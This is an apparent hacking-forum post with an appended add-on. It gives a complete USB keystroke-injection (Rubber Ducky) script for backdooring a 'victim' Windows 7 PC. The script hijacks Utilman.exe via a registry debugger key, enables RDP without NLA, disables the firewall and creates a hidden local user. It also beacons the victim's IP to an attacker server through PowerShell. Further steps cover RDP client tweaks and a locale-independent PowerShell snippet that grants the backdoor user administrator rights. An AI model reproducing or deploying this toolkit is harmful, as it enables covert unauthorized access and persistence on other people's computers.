Hi there,
I just want to share some experience with a workaround for different locales when using exploits
like utilman https://github.com/h...utilman-exploit and creating a local user with administrator rights.
The main problem is that the current firmware does not support the Russian language (and many others),
so it is impossible to change file ownership or add a newly created user to the admins group,
because, for example, in a localized Windows version the Administrators group name is also localized
(_Administratory_) (unfortunately this forum does not accept RU chars, so I cannot use the Russian word here),
so commands like these will never work:
[CODE]
STRING icacls "%systemroot%\System32\Utilman.exe" /grant _Administratory_:F /T
[/CODE]
[CODE]
STRING net localgroup _Administratory_ Local000 /add
[/CODE]
The post by [b]PCFreak[/b] is amazing http://forums.hak5.o...ouching-a-file/ and it helped me a lot to make such a workaround. As there is very limited time while injecting the victim computer, especially if you will not have physical access to this PC later, Terminal Services is also used here to get full access. The idea is to add a local user with restricted rights + the utilman hack 'by PCFreak', and then remotely run cmd.exe using the "Ease of Access" button at the logon screen and promote the user to Admins. After the injection the script makes an HTTP request to a specified server using PowerShell, so you can easily find its IP address in the web server log file. Sure, this will work only for real IP addresses, but not with fake ones or NAT. Windows 7 example, ANY localization, but the default keyboard input locale should be US-English anyway, unfortunately. So before injecting, try to check or change this. I do not know a workaround here, let's discover together?
[CODE]
REM Open the Start menu and launch cmd.exe elevated via the context menu (cursor keys, no localized hotkeys)
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
MENU
DELAY 1000
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
DELAY 1000
REM Confirm the UAC prompt
LEFT
DELAY 200
ENTER
DELAY 200
ENTER
REM Utilman hack: run cmd.exe instead of Utilman.exe via Image File Execution Options
STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f
ENTER
DELAY 200
REM Enable Terminal Services without NLA so the logon screen is reachable remotely
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
ENTER
DELAY 200
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 1 /f
ENTER
DELAY 200
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 200
REM Disable Windows Firewall
STRING netsh firewall set opmode disable
ENTER
DELAY 200
REM Create the restricted local user
STRING net user Local000 /add
ENTER
DELAY 200
STRING net user Local000 *
ENTER
DELAY 200
STRING password
ENTER
DELAY 200
STRING password
ENTER
DELAY 200
REM Beacon to your web server so the victim's IP shows up in its log file
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://_server_IP_address/injected_host.html','%TEMP%\~tmp932.txt');
ENTER
DELAY 200
STRING exit
ENTER
[/CODE]
This script also enables Terminal Services in old-client compatibility (without NLA) mode and disables Windows Firewall. To connect to the remote logon screen from NLA-enabled MSTSC clients like the one in Windows 7 you also need a client-side modification, otherwise the username and password will be requested before connecting to the server and you will never be able to see the logon screen or use the EoA button. To resolve this issue you need to save an empty RDP file and edit it using any editor like notepad.exe; these params should be changed/added:
[CODE]
authentication level:i:0
enablecredsspsupport:i:0
[/CODE]
After this modification save the file and connect to the server; you will go directly to the logon screen.
Give admin rights to your new user and after this you'll be able to log in remotely (and locally, sure).

BTW, another locale problem is that fast keys (underlined chars in menu items) in the Start menu or right-button menu are also localized, so for this reason I am not using these like
[CODE]
MENU
STRING a
[/CODE]
Instead of this I select the menu item using cursor keys:
[CODE]
MENU
DELAY 1000
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
[/CODE]
I hope it will be helpful for someone.

PS: this script will also work within a Terminal Services session, so you will also be able to inject a remote PC using the local USB port; usually it is connected to the session on the remote side (only in fullscreen mode).

Regards from Russia :)
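As an added example that is not part of the original post (and not PCFreak's or the author's method): the localized Administrators group name can be sidestepped entirely by resolving the group from its well-known SID, S-1-5-32-544, on the target, so the Ducky never has to type anything non-ASCII. icacls also accepts a SID directly when it is prefixed with `*`. The user name Local000 and the Utilman.exe path are taken from the post; the SID-to-name translation through .NET is my addition, and it works on the Windows 7 PowerShell 2.0 as well as on later versions.

```powershell
# Added example, not from the original post. Resolves the built-in
# Administrators group from its well-known SID so the same commands work
# on any Windows language. Run from an elevated prompt, e.g. the cmd.exe
# opened through the Utilman hack at the logon screen.

$adminSid = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544'

# Translate the SID into the account name exactly as this OS spells it:
# "BUILTIN\Administrators" on an English install, the localized
# equivalent on a Russian, German or any other localized install.
$adminAccount = $adminSid.Translate([System.Security.Principal.NTAccount]).Value
$groupName = $adminAccount.Split('\')[-1]

# net.exe wants the bare, localized group name; quoting covers names with spaces.
# Local000 is the restricted user created by the Ducky script in the post.
net localgroup "$groupName" Local000 /add

# Verify the membership the same locale-independent way.
net localgroup "$groupName"

# For the file-ACL variant of the utilman trick, icacls takes the SID itself
# when it is prefixed with '*', so no name translation is needed at all.
# Ownership must be taken first, since TrustedInstaller owns Utilman.exe.
takeown /f "$env:SystemRoot\System32\Utilman.exe"
icacls "$env:SystemRoot\System32\Utilman.exe" /grant "*S-1-5-32-544:F"
```

Typed by the Ducky this is easiest as one `powershell -Command "..."` line from the elevated cmd.exe; only ASCII ever crosses the keyboard, which is the whole point. On Windows 10 and Server 2016 the LocalAccounts module offers `Add-LocalGroupMember -SID S-1-5-32-544 -Member Local000` directly, but that module is not present on Windows 7, which is why the example goes through the SID translation and net.exe.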